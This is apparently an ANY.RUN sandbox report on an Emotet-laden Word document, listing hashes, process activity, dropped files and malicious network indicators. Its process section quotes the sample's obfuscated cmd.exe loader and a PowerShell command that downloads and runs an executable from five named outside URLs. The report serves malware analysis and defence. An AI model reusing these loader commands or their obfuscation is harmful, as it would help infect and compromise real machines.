analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

82a531f2c8c05eb3184e953e768cf6c6.doc

Full analysis: https://app.any.run/tasks/62042e6c-8052-4c6f-a5e7-90dabd7576bf
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2018, 13:38:40
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
emotet-doc
emotet
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 07:32:00 2018, Last Saved Time/Date: Thu Dec 6 07:32:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 42, Security: 0
MD5:

82A531F2C8C05EB3184E953E768CF6C6

SHA1:

409517BBDE819981DE55BEDDBF3199886AECD82F

SHA256:

1789C3005103B9B83B5EA6D77ACC7A1A67BC8B77B2A0714BA34EC56CD4211B19

SSDEEP:

3072:S8GhDS0o9zTGOZD6EbzCdQq3/I7ChQ1aL1C:8oUOZDlbeQqPIehQ1aL1C

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3340)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3340)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3008)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2568)
      • cmd.exe (PID: 3136)
      • cmd.exe (PID: 3416)
      • cmd.exe (PID: 3008)
    • Application launched itself

      • cmd.exe (PID: 3136)
      • cmd.exe (PID: 3008)
    • Creates files in the user directory

      • powershell.exe (PID: 2544)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3340)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3340)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 48
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 42
Words: 7
Pages: 1
ModifyDate: 2018:12:06 07:32:00
CreateDate: 2018:12:06 07:32:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
9
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs find.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3340"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\82a531f2c8c05eb3184e953e768cf6c6.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2568c:\djlHiiJvoFIViL\RzjPdOpBsDBQMi\YRLnzqw\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3136CmD /V:/C"set NP=wrjtPpKmHtfYCRSfWFGJRYfCti7-z$}sA)c@(,BI{vT/2;x yl\khn0VX9Du6a'8dbe:N1=Lqo.+g&&for %v in (29,7,18,14,70,62,71,68,18,62,45,29,22,51,34,70,53,66,0,27,73,65,2,66,34,24,47,68,66,24,74,16,66,65,23,49,25,66,53,24,45,29,56,19,71,70,62,52,24,24,5,67,43,43,7,61,1,72,59,25,31,66,64,25,61,7,73,53,64,66,53,76,61,76,66,7,66,53,24,1,25,53,76,74,34,73,7,43,20,22,76,35,52,24,24,5,67,43,43,73,7,25,64,69,31,52,73,5,74,34,73,7,43,44,25,48,2,28,73,35,52,24,24,5,67,43,43,53,52,61,51,52,73,61,59,34,34,52,61,59,74,34,73,7,74,41,53,43,1,25,23,39,21,49,4,63,35,52,24,24,5,67,43,43,53,48,34,22,5,22,74,34,73,7,43,44,49,54,35,52,24,24,5,67,43,43,7,25,74,65,7,76,59,27,64,66,41,74,34,73,7,43,60,61,25,62,74,14,5,49,25,24,36,62,35,62,33,45,29,2,34,25,70,62,56,0,73,62,45,29,4,56,71,47,70,47,62,60,57,26,62,45,29,24,28,61,70,62,52,68,21,62,45,29,28,56,32,70,29,66,53,41,67,24,66,7,5,75,62,50,62,75,29,4,56,71,75,62,74,66,46,66,62,45,22,73,1,66,61,34,52,36,29,18,68,65,47,25,53,47,29,56,19,71,33,40,24,1,48,40,29,22,51,34,74,58,73,0,53,49,73,61,64,17,25,49,66,36,29,18,68,65,37,47,29,28,56,32,33,45,29,25,71,55,70,62,16,38,0,62,45,39,22,47,36,36,18,66,24,27,39,24,66,7,47,29,28,56,32,33,74,49,66,53,76,24,52,47,27,76,66,47,63,54,54,54,54,33,47,40,39,53,41,73,51,66,27,39,24,66,7,47,29,28,56,32,45,29,42,56,21,70,62,25,7,6,62,45,65,1,66,61,51,45,30,30,34,61,24,34,52,40,30,30,29,17,5,25,70,62,19,5,32,62,45,80)do set P9M=!P9M!!NP:~%v,1!&&if %v geq 80 echo !P9M:~5!|FOR /F "delims=D.j tokens=2" %w IN ('ftype^^^|find "llDa"')DO %w -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2936C:\Windows\system32\cmd.exe /S /D /c" echo $mGS='LNG';$fkc=new-object Net.WebClient;$XJL='http://marquisediamondengagementring.com/Rfg@http://omid1shop.com/2iyjzo@http://nhakhoaucchau.com.vn/riCIYlP8@http://nycfpf.com/2l0@http://mi.bmgu-dev.com/6ai'.Split('@');$jci='Xwo';$PXL = '697';$tza='hNY';$zXA=$env:temp+'\'+$PXL+'.exe';foreach($GNb in $XJL){try{$fkc.DownloadFile($GNb, $zXA);$iLV='WBw';If ((Get-Item $zXA).length -ge 80000) {Invoke-Item $zXA;$TXY='imK';break;}}catch{}}$Fpi='JpA';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3008C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=D.j tokens=2" %w IN ('ftype^|find "llDa"') DO %w -"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3416C:\Windows\system32\cmd.exe /c ftype|find "llDa"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3648C:\Windows\system32\cmd.exe /S /D /c" ftype"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3748find "llDa"C:\Windows\system32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2544PowerShell -C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 340
Read events
945
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3340WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR58DE.tmp.cvr
MD5:
SHA256:
2544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YNQPDOYZKJ9WDA3P4B5G.temp
MD5:
SHA256:
3340WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C6A868AE1338116B7814F79908C5AC3D
SHA256:F2A28EC0688C61169886E331CE788ACD4DD30A4394E08AC950C5488C0D6A38F5
2544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2544powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF24694a.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3340WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$a531f2c8c05eb3184e953e768cf6c6.docpgc
MD5:979B16B90969EA4343AB7747BDD7417F
SHA256:836D3E539E82902D0BF1A3FC3659F10F79F50C38936D4F8328C6DCC349DEA2FE
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2544
powershell.exe
GET
404
144.76.170.98:80
http://omid1shop.com/2iyjzo
DE
xml
345 b
malicious
2544
powershell.exe
GET
404
162.144.47.1:80
http://nycfpf.com/2l0
US
xml
345 b
malicious
2544
powershell.exe
GET
404
149.47.76.202:80
http://marquisediamondengagementring.com/Rfg
US
xml
345 b
malicious
2544
powershell.exe
GET
404
45.77.241.211:80
http://nhakhoaucchau.com.vn/riCIYlP8
US
xml
345 b
malicious
2544
powershell.exe
GET
404
173.212.199.186:80
http://mi.bmgu-dev.com/6ai
DE
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2544
powershell.exe
149.47.76.202:80
marquisediamondengagementring.com
NEXCESS.NET L.L.C.
US
malicious
2544
powershell.exe
45.77.241.211:80
nhakhoaucchau.com.vn
US
malicious
2544
powershell.exe
144.76.170.98:80
omid1shop.com
Hetzner Online GmbH
DE
malicious
2544
powershell.exe
173.212.199.186:80
mi.bmgu-dev.com
Contabo GmbH
DE
malicious
2544
powershell.exe
162.144.47.1:80
nycfpf.com
Unified Layer
US
malicious

DNS requests

Domain
IP
Reputation
marquisediamondengagementring.com
  • 149.47.76.202
malicious
omid1shop.com
  • 144.76.170.98
malicious
nhakhoaucchau.com.vn
  • 45.77.241.211
malicious
nycfpf.com
  • 162.144.47.1
malicious
mi.bmgu-dev.com
  • 173.212.199.186
malicious

Threats

PID
Process
Class
Message
2544
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2544
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2544
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2544
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2544
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
No debug info